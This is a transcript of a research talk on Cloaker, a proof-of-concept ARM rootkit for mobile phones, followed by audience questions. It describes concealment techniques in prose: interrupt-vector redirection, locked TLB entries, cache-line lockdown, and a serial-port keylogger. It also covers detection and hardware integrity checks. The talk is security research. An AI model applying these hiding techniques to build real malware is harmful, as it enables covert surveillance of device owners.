15889 >> Helen Wang: Good morning, everyone.

advertisement
15889
>> Helen Wang: Good morning, everyone.
It's my pleasure to introduce Francis David. Francis David is a Ph.D. candidate from University of
Illinois at Urbana-Champaign.
You're supposed to get your Ph.D. in August sometime?
So he's interviewing with the security part of the distributed system and security group, and he's
going to tell us about some of his work on how to exploit hardware features to undermine
software security.
>> Francis David: Thank you, Helen.
Good morning.
And like Helen said, I'm going to talk to you about how some hardware features can actually
undermine system security.
And none of us can deny that there's been a rapid growth in hardware technology.
There's been really progress from single-core CPUs to multi-core CPUs of today.
There's the GPUs, and computers have gone from 10 million transistors to a hundred fold
increase in that number.
And there's been work and I see even doing computation on these GPUs now. So there's lots of
cores and more features.
There's lots of complexity. And a lot of this is configureable, and all of this gives you tremendous
opportunity. There's a lot of opportunity to build really interesting systems.
But there's also a huge opportunity here for malware
since this complex hardware has significant state information, there's so much configuration
settings, and it's highly configureable.
There's lots of debug features that are left into the hardware, and there's lots of unused
functionality as well. So if you take a typical cell phone, the actual hardware in the cell phone
supports a lot of functionality.
And there's many timers, there's lots of specialized features on the phone which most operating
systems don't end up using.
The operating systems tend to be general-purpose operating systems. So if you take Linux, for
example, it doesn't really exploit every single feature that's on these mobile phones, for example.
So there's lots of unused functionality.
There's also unexpected behavior of hardware. Sometimes the hardware behaves in ways that
you don't really expect.
So what I'm going to talk to you today about is two different tools essentially that prove the cause
attacks which demonstrate that hardware features and behavior can be actually exploited in order
to build malware.
And the two projects I'm going to talk to you about are Cloaker, which essentially exploits
hardware features in order to provide a malicious rootkit environment, and the other thing I'm
going to talk about is BootJacker, which essentially exploits memory preservation, DRAM
memory preservation, in order to break into a system.
And that essentially brings us to the outline of today's talk.
It's a long talk, so I'm going to spend most of my time on the Cloaker rootkit, work and I'm going
to give you a brief overview of the BootJacker work before concluding and talking about some
other topics.
So let's start with Cloaker. And I'm not going to take a complete credit for the whole thing. This
was definitely joint work. The paper would not have been possible without my colleagues at the
university. Alex (phonetic), Jeff, and my advisor, Professor Campbell.
And what we are looking at here is rootkits. And to put the notion of rootkits into the right
perspective, I have this picture here that essentially shows you a typical attack scenario.
So the attacker first has to break into the system, essentially exploit some sort of design flaw or
an implementation flaw or like just brute-force password cracking or social engineering attacks
just to gain access to the system.
Then the next stage is somehow maintaining control over the system. And that's where the
rootkit comes in. So the attacker removes all the faces of the break and inserts the rootkit. And
that's going to be kind of the main focus of today's talk on the Cloaker part of it.
And the rootkit essentially provides a platform in some sense for performing malicious activity,
and that's stealing passwords, financial information, or running bots for spam or just using it as
another platform to attack others.
So I'm not going to really talk about a vulnerability in the system that an attacker is going to using
to break in. I'm assuming there's going to be some vulnerability and -- I mean, this is -- it's well
known, there's lots of different platforms today that there's always some vulnerability.
The iPhone was broken into. Linux (inaudible) broken into. So I'm not going to talk about how to
break into the phone, but I'll talk about how to maintain surreptitious control.
So in order to put this rootkit that we built into perspective, there's lots of other folks who have
been researching rootkits and malware.
And rootkits initially started off being user-mode applications. So there were these user-mode
vanity programs that would replace system files on your computer. The Linux system, for
example, the process -- the program that displays the process list would be replaced by this other
binary which would hide a malicious process, for example.
And then rootkits moved on to being kernel mode when system defenders, essentially, and
security researchers started figuring out ways to detect user-mode rootkits and so on.
There's been stages of development. And all of this has essentially been driven by advances in
detection technology.
So there's this continual struggle between the good guys and the bad guys, and so that kind of
drives this evolution. And let's look at each of those stages in a little bit more detail.
The user mode rootkits, like I said, essentially are modifications to user programs. And when
such rootkits were found in the (inaudible), the detection techniques that people came up with
were essentially to ensure that the integrity of the system files is preserved, and so they built
integrity checkers.
And there's also, like, traditional antivirus signature checking type of tools as well which check for
malware signatures in various files of the system. So once there were easy detection techniques
for user-mode rootkits, the malware guys resorted to kernel-mode rootkits where they would
insert kernel modules, modify the kernel in various ways.
And there are two distinct categorizations of such kernel-mode rootkits as well. So one class of
such rootkits modifies kernel code. And these are kind of easy to detect. Again, you can just use
the same signature integrity check kind of ideas and apply them to the kernel space.
And the other type of kernel mode rootkits manipulates kernel data, and these are more insidious.
So they would essentially manipulate some state, dynamic state, in the kernel, and detecting
these by integrity or signature checks isn't sufficient.
So researchers came up with lots of anomaly checkers which check for odd behavior in the
system, so looking at the system from two different perspectives, for example, a high-level view
and a low-level view, and seeing if they match, so studying and trying to extract some anomalous
behavior of the system. And they were pretty successful at that.
Modern anomaly detection techniques essentially, they've shown that they can detect a lot of
these existing kernel-mode rootkits that are out there.
So the next step. Former rootkits were proposed a couple of years ago, and essentially they
work in the same way as kernel-mode rootkits while normal operation. The former aspect of it is
just for persistence so that they can remain in the system through a power down, up, through a
power-cycle operation.
And this is essentially done by white hat researchers, and they essentially show that you could
have such rootkits that reside in the BIOS of the system, the ACPI or the PCI BIOS and so on.
And then Sam King pioneered the work on virtualization-based rootkits here at Microsoft
research, in fact, and the idea there is to run the rootkit, the malware, at a layer lower than
everything else that's running in the system. So you move the whole rootkit to the virtual machine
monitor and run the rest of the system as a virtual machine.
And people have argued that maybe such rootkits aren't that big of a deal because, I mean, there
are techniques that one can employ just to check for the fact whether or not you're running in a
virtualized environment, and that would hopefully kind of indicate that there's something wrong in
the system.
So maybe detection of virtual-machine-based rootkits is just really (inaudible) to the problem
detecting if you're running in a virtualized environment.
And like I said, Subvert (phonetic) is one of those rootkits. Bloopel (phonetic) is another rootkit
that uses AMB's hardware virtualization support.
And to be fair, only these first two types of rootkits have been seen in the wild today -- oh, it
keeps popping up -- but the former rootkits are -- wow. Do not show this method again. Oh, no?
Okay. Maybe we can just turn it off. Okay.
So to be fair, only those first two types of rootkits have been seen in the wild today, and former
rootkits virtual-machine-based rootkits and what I'm going to talk about are all completely the
work of white hat researchers.
You know how always people say that you have to be one step ahead of the bad guys? Right
now we're three steps ahead of the bad guys. So that should be good, right?
So what I want to talk to you today about the Cloaker work is it's a hardware-supported rootkit
which essentially operates similar to a virtual machine-based rootkit in the sense that there's no
modifications that are done to the OS or the applications.
And the way it survives is by only modifying hardware state and settings. So it manipulates all
these register settings and hardware flips, bits, and so on, in order to survive.
And since there's absolutely no dependence here any of the host or web services, it has to
provide its own environment for malware, and by kind of essentially divorcing itself from the rest
of the operating system it can totally evade any signature checkers or integrity checkers or
anomaly checkers, only looking at the operating system. So in some sense such rootkits
essentially exist in a parallel world from the operating system.
And that brings us to how do we build such rootkits. So Cloaker, which I'm going to talk about
today, is built for Linux on the ARM platform. And like I said, it has to provide its own mini OS
environment, essentially, for running malware. And I'm going to talk about a couple of malware
payloads later on. And the services that Cloaker provides are, like a typical operating system, it
has memory management support, interrupt management, and it has even networking support.
And Cloaker is a non-persistent rootkit. So since we're talking about a phone here, we argue that
having a persistent rootkit on the phone -- I mean a non-persistent rootkit on the phone is fine
because people rarely let their phones die from a loss of battery power, so people usually keep it
charged.
But if you need to go into persist, for persistence we had to modify some part of the system which
opens us up to detection.
You had a question?
>>: You said that this will not be detectible by anomaly detection?
>> Francis David: Yes.
>>: So will it slow down the execution of the, I guess think of it as primary OS on the phone in
any way?
>> Francis David: So the way we designed our current rootkit, it does slow down the execution of
the primary OS a little bit. And I'll show you a slide later on that shows the amount of the
slowdown.
But there's ways to bypass that as well. And we discussed that aspect of it, and it boils down to
the notion of -- there are two things you can do. One is actually how do you measure time? And
if the time source is from a local timer on the system, the rootkit can modify the time surge. If it's
like an instruction counter that can be modified as well, the rootkit can modify that so that it come
up with counter-defenses.
The other thing that we've been also discussing is since this is a cell phone system, it has to have
power management.
So we came up with the notion of essentially running the rootkit just when the OS is going to
sleep.
So at that point, by definition, nothing else should be running on the system. So there should be
no other software-monitoring tool that's going on, and the rootkit can actually run when the
system is sleeping in some sense.
So there are other approaches to countering that problem, and I will talk about that later on as
well.
Another question?
>>: (Inaudible).
>> Francis David: Oh, you can have -- if you have another question.
>>: With both of those answers, I find them satisfactory. With the first one you said -- or maybe it
was the second one -- running while powered down. Then you're trading off the battery resource,
you're consuming more battery. With the first one -- oh, of virtualizing time, that takes it -- that
assumes that you're not dealing with somebody who can have access to the network as part of
their detection codius (phonetic). So both of these seem like saying I'm going to assume that the
-- that I get to take the last step in this game rather than my opponent.
>> Francis David: Yeah, you're right. So the question -- I mean the point is, it's like a continual
battle here. So if the good guys come up with a particular solution, the bad guys come up with a
counter solution. And that's what you're talking about here, right?
>>: Well, once I take -- will I get to take the next step?
>> Francis David: In some sense, yes. So if you have the last say in it, then maybe. And -yeah. Yes.
>>: But if the person creating the rootkit has the last say, it always has ->> Francis David: That's always the usual case as well,
because --
>>: In that case, I don't think that's a worthwhile assumption, because if you make that
assumption, I can find out what the code is that is supposed to be doing the detection and just
make sure it always returns no rootkit. So -- because if you set up the game such that the
attacker has the last move, the attacker then knows what the checker software is and can just
make sure it modifies the codus (phonetic) for your rootkit
>> Francis David: Oh, but the checker software could also be protected by hardware, and it may
not be easily modifiable. So you're even talking about scenarios here where the checker
software is -- I mean, you have a complete roof of trust right from the hardware to the checker
software. If the checker software is only checking the integrity or signatures in the OS, it's still not
going to be able to find our rootkit.
and in cases where the rootkit would modify the OS, the checker software, if the root of trust is
from the hardware, the checker software cannot be subverted.
So do you see what I'm saying? If the checker software has been authenticated from the
hardware, it cannot be subverted, even if the rootkit were running in the OS.
>>: (Inaudible)
>> Francis David: So I was talking about ARM all this while, and essentially the reason we
looked at ARM was because ARM powers a lot of mobile devices today. And it's not just the cell
phones. It also has like GPS devices it powers, Ford's Fusion system, and so on, and there's
also there's going to be an explosive growth in such devices.
Yes?
>>: (Inaudible)
>> Francis David: So by nature of such -- I mean the design of such rootkits is very tied to the
hardware, because I'm talking about hardware features, and our particular rootkit is tied to the
ARM platform.
>>: (Inaudible) I mean are the things that you exploit specific to the ARM processor and not, say,
intel (phonetic)?
>> Francis David: Yes. Almost. There could be similar parallels in other architectures, but
certain things that we exploit are very ARM specific.
what we're trying to do here is essentially to bring out this notion of a class of new malware which
is hardware supported, and this is just one instance. And I'll show you another example later on
as well. But we're kind of trying to bring out this notion of the existence of this different class.
So like I said, there's going to be a whole number of such devices on the market, so there's going
to be 4 billion cell phone subscriptions in a couple of years, and this is -- analysts say this. And
that's kind of almost one phone for every two people on the planet.
And in contrast, the number of PCs is just going to be like one fourth of that. So it's a platform
that has tremendous impact. And it's not just mobile devices and cell phones. A lot of consumer
electronics, toys even, use this processor.
So the reason I have this slide is that it shows that the domain we're targeting is significant.
I think I probably skipped over a slide, but what we're looking at here is essentially a slide that
shows how our rootkit operates.
There's essentially two things our rootkit exploits, one of which is flipping a bit to redirect
interrupts.
And the way this works is on the ARM platform, the ARM 9, there's two different locations at
which the interrupt vector can reside, at the zero address or at this high address here.
And a bit in a processor configuration register determines where the interrupts get dispatched,
and typical operating systems like Linux or a couple of other ARM-based operating systems we
looked at relocate the interrupt vector to the high address so that they can map this low address
to a null page which kind of helps in debugging so that there's a null point, in essence, they can
easily -- during development they can catch it and fix it.
So they always map the zero page to a null page and they have the interrupt vector up there.
So what Cloaker does is it first flips that bit the other way so that interrupts start getting sent back
to the low address.
And now the other question is how does Cloaker manage to get that page mapped in without
modifying the OS page tables?
And the way Cloaker does that is it inserts a locked TLB entry. And this is a feature that's on the
ARM processor, to answer your question.
And so it inserts a locked TLB entry which the OS has no way to even go and read. The ARM
doesn't provide support for the OS to go read these TLB entries even. And this locked TLB entry
can essentially map in arbitrary regions of the physical address space into virtual memory, so
these addresses are virtual memory addresses.
And what happens here is now that Cloaker flips this bit and inserts a mapping for the zero page,
it can go put in an interrupt vector at that zero page to read that interrupts to itself.
And this essentially brings it down to your question where it's intercepting every single interrupt
now. And so what we do now is we don't want to slow down the system significantly.
So what we have here is, for interrupts that are critical, time critical, so for timer interrupts, we
would just do really quick pass-throughs to the OS. We don't interpose on any timer interrupt
path. We would only interpose on interrupts that are very asynchronous, like a network interrupt
or like a keyboard interrupt or something like that, which essentially gives you a little bit of
protection against a timing-based detection.
And when you run malware code on the asynchronous pads, the OS really doesn't know when to
expect those interrupts. So it still just delays it by a little bit.
Yes?
>>: So you said you inserted (inaudible) TLB entry which is what prevents the system's page
table from knowing about the existence of the memory where the rootkit is running, correct?
>> Francis David: The locked TLB entry essentially avoids modification of the OS page tables.
>>: Right. But then what prevents the system from allocating a page in the area where the
rootkit is residing?
>> Francis David: Okay. So that's the next slide. I think -- I'll get to that in the next slide.
Yes?
>>: I have a question. Does that like choose to inject your payload with a certain kind of interrupt
that happens, like a malware to interrupt or something?
On the other hand, have you thought about -- you just choose to inject your interrupt based on
some timer you (inaudible) about the CPU? Because for most interrupts I think they just execute
the critical parts with a small amount of code. So it doesn't make a difference between a malware
packet arrival or some other thing, right? The critical part is very short. Then they just give the
control to the CPU. So that won't make a difference.
>> Francis David: I'm not sure I understood your question.
So are you saying that it's okay to intercept all interrupts or ->>: I'm saying ->> Francis David: It's okay ->>: (Inaudible) to inject your payload not based on the type of the interrupt but based on a pace
you keep.
>> Francis David: Oh, okay, a pace that you maintain. So that's definitely possible.
One thing that we still are able to do with our rootkit is enable any unused timers, for example,
that are on the board. And one of our payloads actually does that. And that will give you a very
controlled pace to do whatever malware work you want to do.
So it depends on how much extra new functionality is there on the system.
And there's one for -- in our case, or in our platform, the Linux kernel uses two of the system
timers, and the third timer can be used for malware.
Okay. So to get back to the other question, let me just first go to the other part first.
So how do we insert this rootkit? We essentially use a kernel module for installation. And you
could think of other really stealthy ways of inserting the rootkit by directly accessing physical
memory through the (inaudible) on Linux, but right now for this proof of concept we just use a
kernel module where you just do a module insert and a module remove and that kind of inserts
the rootkit.
And to answer the other question, where does physical memory come from, where does the
actual rootkit reside in memory, there's several places to do this.
One is essentially to use on-chip SRAMs. So on these mobile platforms there's usually a couple
of kilobytes of on-chip RAM that are -- that's used for fast execution or for like power
management, and you could use that portion of memory.
Or the other thing you can use is NOR flash. NOR flash is -- I don't know if you know about this
property of NOR flash, but
NOR flash allows you to actually execute code off of it directly just like you would do from a
normal memory.
So unlike NaN flash, which has to be accessed in blocks, NOR flash can -- you can actually
execute code off of it, so you can use memory NOR flash.
The other thing you can -- the simplest thing you can do is essentially just allocate some memory
inside the kernel in our module, for example, and just cause a memory leak in some sense. I
mean, it just looks like a memory leak into the OS. So there's several options. We just picked
the simplest option that just came out.
Does that answer your question?
Yes?
>>: (Inaudible).
>> Francis David: No. I mean, it's like a memory leak. So you can insert the module.
Okay. The next thing I'm going to talk about is the services that are provided by Cloaker.
So Cloaker, it's just the hiding mechanism and operating environment. It has to provide a couple
of services. We wrote a service for dynamic memory management using the buddy memory
allocation algorithm.
Eventually we discovered that we could write a lot of payloads without using dynamic memory
management. And so it's an optional kind of payload, but still there.
And we also have interrupt management support in Cloaker. It would let payloads independently
enable/disable interrupts for different devices. For example, if they want to monitor a particular
device, they can -- the library also supports lookup for the current interrupt numbers and allows
you to register -- allows malicious payloads to essentially register handlers for those interrupts.
And Cloaker also has networking support. And this is not complete networking support in the
sense that it doesn't have the complete TCB stack in there. It essentially lets you do IP
communication. And the way we do this in Cloaker is we use a really stripped-down version of
the Linux kernels Ethernet driver.
So the intuition behind this is you don't really need code for initializing the device or tearing down
the device, a lot of these different types of functionality. All you need is a routine that lets you
send a packet and a routine that lets you receive a packet.
And you can rebuild this really small network driver in some sense. And once you have these two
mechanisms to send and receive packets you can achieve IP networking by discovering two
parameters, which are like the gateway, MAC address, and the source IP address. So if you
have those two parameters, then you can start sending out network packets.
And the way we discovered those two parameters is pretty easy as well. So periodically we
intercept some incoming network packets and we pull off a packet from the network card, the OS
doesn't see it, but it's seated like packet loss on the network so it isn't really a big deal.
Yes?
>>: (Inaudible) Ethernet driver rather than just hooking the OS's?
>> Francis David: So the reason we didn't want to hook the OS's is not modify any part of OS.
So we didn't want to -- oh, you're talking about actually using the OS code directly?
>>: (Inaudible)
>> Francis David: Yes, so that's definitely another option that we've also looked at, to just use
the code so you don't even have to have local code.
In that case we had to make some modifications so that it doesn't interact with the OS driver in
weird ways. So the OS driver that's the Linux kernel does a bit of locking, and so on, which we
can't reuse in our rootkit because it modifies OS state.
>>: (Inaudible) why you can't just hook the packets as they come up from the system into like the
IP stack or on any layer of the stack just to redirect calls inside the kernel.
>> Francis David: Oh, so -- the only thing we can do is actually go read a packet if it's in an OS
buffer. We can't really modify the OS control flow in any way because that opens you up to -- if
you have to modify control flow, then it opens you up to all those other detection techniques.
>>: (Inaudible)
>> Francis David: I didn't get your question.
>>: (Inaudible)
>> Francis David: Uh-huh.
>>: (Inaudible)
>> Francis David: So the OS can ->> (Inaudible)
>> Francis David: So you're right. I mean, there's one bit that we flipped, right? And if the OS
goes and checks for that bit, you can essentially detect our rootkit. That's what you're saying,
right, in some sense?
>>: Exactly.
>> Francis David: Yes. So that's definitely true.
So what I'm trying to bring out here is not that that one particular vulnerability exists. I'm saying
that there's class of such vulnerabilities. And in a couple of slides I'll show you another technique
that doesn't use that flip-bit mechanism.
So Cloaker is just a proof of concept that's trying to demonstrate that this class exists, and it's not
about this particular vulnerability. You can't place your finger on this thing and say, well, this bit is
flipped, and therefore if I go check for this, I can avoid this class of rootkits or this class of
malware.
So I'll show in a couple of slides another way to do the subversion that doesn't use that bit.
So we do get that question a lot, which is why we came up with the other alternative.
>>: (Inaudible)
>> Francis David: Can I interrupt the moment with the (inaudible) specific bit?
So the other attack I'm going to show you can actually let you do that. Right now we can't
because we're not interposing on any OS read operations at all. So we're not modifying -- we can
possibly insert a TLB entry for that -- actually, the bit manipulation is essentially a hardware
instruction.
So it directly reads it off a processor (inaudible) register, so it's very difficult to intercept that
request unless you're intercepting that whole page that that instruction exists on and trying to
subvert it. It's more complicated. There's an easier way to do it, and I'll show you in a minute.
Other questions?
Okay. So getting back to the IP networking part, we intercept a couple of arbitrary packets off the
network. We have this packet header buffer inside Cloaker which has a pre-filled-in entries for
things like the destination MAC, the source MAC -- I mean the destination MAC has to be the
gateway MAC, and that needs to be figured out. The source MAC can be read from the Ethernet
card, and it has the IP header field and so on.
And the way we fill up this packet header is that once you see an intercepted packet that's
coming from a different subnet, we just copy the source MAC off into the destination MAC here,
which is actually the gateway MAC, and we copy the destination IP address, which is the source
IP address. So that way we get the source IP address.
The other alternative is to go mess with the OS structures, but this kind of gives us a little bit of
OS independence at least, and that gives you complete IP networking.
Yes?
>>: (Inaudible)
>> Francis David: You cannot (inaudible).
>>: In other words, you said that (inaudible) gateway, which means you can't attack any of the
local devices on the network now. You can only attack ones that (inaudible).
>> Francis David: Yes, you're right. So this is just a simple illustration for how you would
essentially send out information from the host. If you wanted to do something like that you could
probably implement ARP locally as well. So it's up to you how much functionality you want in the
system.
The other thing I'm going to spend some time talking about is the keylogger that we have built as
a payload for Cloaker. So these are a couple of payloads that I'm going to talk about now.
And this one intercepts input on the serial port, and this is like a typical serial port. You're
considering an NS serial port that's standard on all PCs as well, so they have some (inaudible)
things on phones.
And these serial ports work by having a free flow buffer for the transmit and another free flow
buffer for the received. The problem here is now that say you want to intercept this input that's
coming on the serial port keystrokes. The problem here is that this chip doesn't let you put back
something that you just read.
So if you read from the received free flow, it would essentially shift all the other content, and so
it's like a shift register. So you read this character out and there's no way to put this back in
again.
So this initially kind of led to some issues, and we were figuring out how to do this keylogging so
that the OS also still receives that character. So you don't want to read a character off and the
OS not receive it.
Yes?
>>: So for the key pad, if you want to intercept, if you want to implement (inaudible)
>> Francis David: On the phones there's a specialized bit of hardware that we haven't really -- on
real phones there's a specialized bit of hardware that we haven't really looked at. So this
keylogger works on this prototype cell phone that we have. And on real phones I'm not sure what
the exact hardware is.
>>: (Inaudible) in the serial port?
>> Francis David: Yes. So what we're doing here is going to take advantage of a weakness in
this particular chip.
>>: (Inaudible)
>> Francis David: You're right about that.
So what we're trying to do here is, again, a proof of concept as well. So we're showing that in this
particular piece of hardware there exists this vulnerability.
On the prototype hardware that we were looking at, this was the only way to get a keyboard input
into the system.
>>: In this particular case you cannot run the rootkit in sleep mode.
>> Francis David: Yes, you're right. So this has to be -- you're intercepting the keyboard input,
which means you delay the input by a little bit.
So we didn't have access to the real hardware on a phone for the keyboard. We didn't have the
specs for that component. But I'm sure there's probably some similar debug feature in that that
can be exploited.
So the way we do the serial port exploit is that we enable this debug feature on this chip which
lets you loop back the transmit lines to the receive lines. And this is used for debugging.
Essentially the way we operate now is we read all of the input that the user types in and then set
this loopback feature, write it back out and then unset that feature. So that essentially lets you
intercept input while still letting that input pass on through to the OS.
So the other possibility here is to directly find an access OS buffer. And, again, this requires
understanding the OS internals. And while it's a possibility, we just thought this was more
elegant.
We wrote another couple of payloads. We wrote ->>: (Inaudible) something comes in and you (inaudible)
>> Francis David: I'm sorry?
>>: So if I understood this, so you're going to read out of the received (inaudible) you just
loopback and send it back through.
>> Francis David: Oh, what happens to the something coming in? Oh, we're looking at human
input here. So the speed at which you can do the loopback, read out and everything is really fast.
>>: (Inaudible)
>> Francis David: So if you can type two characters within microseconds, then -- I'm not trying to
essentially say that this works for a generate serial port interception at the MAC.
>>: (Inaudible)
>> Francis David: No, in this case we essentially turn on the debug mode, loopback the input
and then turn off the debug mode. So this one you wouldn't even see.
So the other two payloads that we worked were like a payload that does essentially a distribution
of service, so it activates an unused timer like I mentioned. There's some bit of hardware that's
unused. So whenever it gets a notification, it will send out a packet using the networking support.
And the other thing we did was essentially send out the keylogger buffer as soon as it's full. As
soon as you have network packets being sent out, then you're vulnerable to network intrusion
detection systems. And we're not going to really delve into that, but essentially once you start
doing externally-visible changes, you're opening up yourself to detection.
So I'm going to now move on to the actual evaluation system, what we did.
So the whole thing was designed and built on the OMAP H2 platform. It's a Texas Instruments
board for -- it's a prototype cell phone, essentially. And it has an ARM9 processor core. We used
the latest Linux kernel. The (inaudible) version really doesn't matter because we're kind of
divorced from the OS. It can run with any Linux kernel.
And the measurements that I'm going to talk about now are, we measured the size of our rootkit.
We also looked at the performance impact on the OS, to answer your previous question.
And I'll also look at the detectability and compare existing approaches in other rootkits as well.
So for the size aspect of it, you can see that we've managed to write Cloaker in a really compact
manner. So essentially this table says that Cloaker is really, really small. You can actually have
Cloaker fit within those couple of kilobytes of SRAM, for example. And in our case we managed
to fit all of Cloaker, including its payloads, within the first eight kilobytes of memory.
And the reason for this is we don't really have to have that much device driver support. And our
payloads are simple as well. So it's a tradeoff. If you want more complexity, you get a larger
size.
But what we're trying to show here is that you can get significant levels of malware, essentially.
You're still able to send out network packets and you're still able to intercept keystrokes, and you
can now do all of that in a really compact manner.
>>: I'm curious. On the denial service, the IP denial service, what does that 12 lines of code look
like over the network?
>> Francis David: So all it's doing is sending a packet over the network. So if you're assuming a
preconfigured attack target, there's no control component yet.
>>: (Inaudible) code that the (inaudible) the payload.
>> Francis David: Yeah.
>>: So are there 11 lines?
>> Francis David: So there's code that's essentially looking up the interrupt. I mean, the timer
interrupt comes in. So the denial of service payload essentially is a timer interrupt that comes in.
The interrupt management system processes it and gives it to you. So there's also code to
enable that initial functionality, that extra timer.
>>: I'm having a hard time figuring out, how do you possibly talk to a (inaudible) enough to get it
to send out a packet in 12 lines?
>> Francis David: The 12 lines doesn't include the actual network code. That's include inside
Cloaker. So the actual network interaction, the driver ->>: So some of those 147 lines (inaudible) network driver.
>> Francis David: Yes. So this 147 lines of code includes all the service that is Cloaker provides.
So the networking, the interrupt processing and the memory management, we left it out
separately.
So it's really easy -- I mean it's really small because, like I said before, you don't have to have all
the code.
And to answer your question before, we took out the Linux driver and stripped out a lot of code
from it. So we couldn't reuse the Linux driver.
Okay. So the performance question. So what does this whole thing do to performance?
So this shows a bunch of statistics that are reported by LM Bench. And you will notice that there
is a small noticeable change in performance when you're running Cloaker because it's
intercepting interrupts.
And, yes, this definitely does open it up to detection in some manner. And like I was discussing
before, it's a continual struggle here.
Yes?
>>: (Inaudible).
>> Francis David: So you're talking about like (inaudible) scaling? On the ARM that we're
looking at, it doesn't have any dynamic for that scaling. But the other attack I'll show you in a
minute probably also avoids this issue at some level.
So detectability. So what I have here is a big table. There's a lot of information in it, but
essentially this column lists all the existing techniques that I used for rootkit detection. So you
have integrity checks of the disk or, like, the process, platform integrity checks, kernel integrity
checks. So I'm including anomaly detectors for the kernel inside this category and the signature
checkers.
The take-away from this slide is the only thing that can actually go and be able to detect Cloaker
effectively is if you do a complete physical memory scan and search for the signature.
Yes?
>>: What do the VMM detectors do?
>> Francis David: The VMM detectors? So the VMM detectors essentially check for the
presence of TLB entries that are being used up in the system by the VMMs. So this was a paper
by folks from Stanford and (inaudible), and the paper was "VMM Detection, Myth Or Reality."
And --
>>: (Inaudible).
>> Francis David: So they have a whole slew of such methods that they use. And TLB sizing is
something they kind of run in order to see those TLB entries that are missing.
Yes?
>>: So with regards to non-persistence, doesn't non-persistence mean that these process
integrity checkers or signature checkers should be able to find -- so for user mode, do you have
user mode non-persistence, you have these processing the checks?
>> Francis David: Yeah. So if you take a signature off all processes, you'll still find it, right? So
it's a user-mode process. So you can think of this as like you're running a user-mode process
and deleting the file, right? So it's not on the disk.
I mean, if you run an integrity check off the disk, you won't find it -- I mean a signature check off
the disk. Unless it's checking all the disk blocks. If you're looking at the file system, it's not there
on the file system anymore because you deleted the file.
But you'll still be able to -- if you look at the process itself, you have the process list, so it's all in
user mode, and a kernel-level detector can go through all the processes and look for signatures.
Yes?
>>: Can you explain why the VMM detector can detect the VNBR (phonetic) but not Cloaker?
Because in some sense I run a VNBR as Cloaker.
>> Francis David: You're right. You're right.
So the reason that Cloaker is not detectible by those VMM detectors is that, at least for this TLB
sizing, for example, when we use those locked TLB entries, the locked TLB entries on the ARM
are an exclusive TLB. So you're not using up the normal TLB entries that are available for the
OS.
So there's eight TLB entries that are specifically reserved for being locked down, and those are
not used by the OS, and then that can be used by Cloaker. So the OS will still see no changes in
the TLB entries.
>>: But there are harmful ways in the VMM detector (inaudible) not just talking about one vector
in the detector that cannot be used (inaudible), right?
>>: I think he's right. I think specifically what you're saying is, yeah, x86 VMM detectors and not
appropriate for catching ARM, right?
>> Francis David: Yes.
>>: If you read (inaudible), basically what they say. And I think you've got exactly the same
problem here. You've basically built a VM rootkit. It's an ARM-specific VM rootkit instead of
x86-specific rootkit, but it is a VM rootkit. Every single one of the techniques you've talked about
are detectible in the same sense (inaudible) your interrupt thing, your TLB. Surely if I was going
to write the paper on how I write a VMM detector for the ARM, one of the things I'd would say is,
well, I should write through all of the locked TLB entries first.
>> Francis David: So you're right. So the thing that we're arguing here about is essentially -- I'm
arguing that there's one thing you can do in order to detect VMM-based rootkits. So you can put
your finger on this thing and say, "I will do a check for a VMM." And there are definite ways to do
that. So there's one thing you can do and it can detect all VMM rootkits.
>>: I think Hal's (phonetic) argument in the (inaudible) paper was that there isn't one thing that
you can do to detect every rootkit, but there are enough things that -- it is a cat and mouse game,
and inevitably you will be able to find -- any rootkit that is in existence, you will be able to find.
That's Hal's (phonetic) argument.
>> Francis David: But there's one thing you can definitely do in order to detect that
virtualization -- you're learning in the virtual machine, right? You can do TLB sizing. There's one
thing you can do.
So my argument is essentially to say that there is no one thing that you can do in order to totally
cover the whole class of hardware-based malware. So for the VMM rootkits, if you do TLB sizing,
you can say that I can detect -- that I'm running the virtual machine and that's it. So I've come up
with a detection scheme. There's no further question on this topic anymore. Right? I've placed
my finger on that and I'm done.
>>: That's really not what they said (phonetic).
>> Francis David: You can discuss this offline.
Yes?
>>: So just to clarify, since there are eight of these virtual-memory-protected TLB slots, you can
try to do a research and strength test if you're the OS to see whether all eight are available to
you?
>> Francis David: You're right. So what you're essentially saying is that there has to be
hardware-level integrity checks. You have to check the integrity of the hardware in some sense,
the hardware state, and that's what we argue for as well.
So we're kind of saying here that it's not sufficient to check the integrity and the sanity of the OS.
You also have to go and check the integrity of the hardware as well. So you have to consider the
system as a whole, both the software and the hardware parts of it.
So we have this argument about checking for the flipped bit. So let me just go and give you
another alternative way of doing this control flow subversion that doesn't use the flipped bit
technique.
So like I said and I've been stressing here, individual vulnerabilities aren't the topic of this talk. So
I'm not trying to say that this particular vulnerability exists, I'm trying to say there's this class of
hardware-based malware that's possible, and I'm essentially arguing that there's no one thing that
you can place your finger on and say this is going to detect all hardware-based rootkits. Those
(inaudible) techniques are probably going to be ineffective.
So the other technique I'm going to show you now is using the hardware architecture for the
cache. So there's a separate data instruction cache, and we use cache line lockdown support in
the ARM in order to do this different attack.
So what we do is we take a line in the data cache, lock it down, and we lock down the correct
values, the OS instructions, in the data cache, and in the memory we actually replace those OS
instructions with our malicious instructions.
And once we do this, essentially you have the malicious code that's getting executed because it
goes to the instruction cache, but if the OS or any detection technique tries to do a checksum or a
signature check, it will not see the malicious code because all of those operations go through the
data cache and that's locked down. So, again, this is another case where I'm exploiting a feature
of the hardware, the architecture, in order to hide the malware.
Yes?
>>: Do you see any way (inaudible) the checker?
>> Francis David: I'll talk about the mitigation techniques in a couple of slides.
So moving on to countermeasures, what we're essentially saying here is there's lots of these
possible ways you can have hardware essentially enable malicious software to operate. And we
have to have some sort of a way to completely check the integrity of the hardware.
So one way to do this from software you still need some hardware support in order to enter a root
of trust, but once you can (inaudible) the integrity of these checkers, you can build this framework
where you have each driver export a checking function that checks the integrity of its associated
hardware, and this essentially kind of gives you a way to check the integrity of various
components of the hardware. And the drivers are the right places to put these checkers because
the drivers are what really understand the hardware. So this is a software-based technique.
The other things that are possible are -- yes?
>>: Would you give us an example (inaudible)?
>> Francis David: So for example -- in the driver for the processor, for example, it would
essentially have a checker that checks for the integrity of the state in the processor, and that
would check for this flipped bit, for example. So the ARM framework essentially just uses return
values in order to signal or flag that something is wrong.
So these are functions that just check some hardware. There's no specific way you need to write
this function as long as it returns yes or no whether or not the hardware matches the state which
it expects or not.
>>: Can you use (inaudible) a checker to check the checkers integrity?
>> Francis David: Yes. So the check management ->>: The check (inaudible).
>> Francis David: So like I said before, we need some sort of a root of trust from the hardware
like a DPM kind of system.
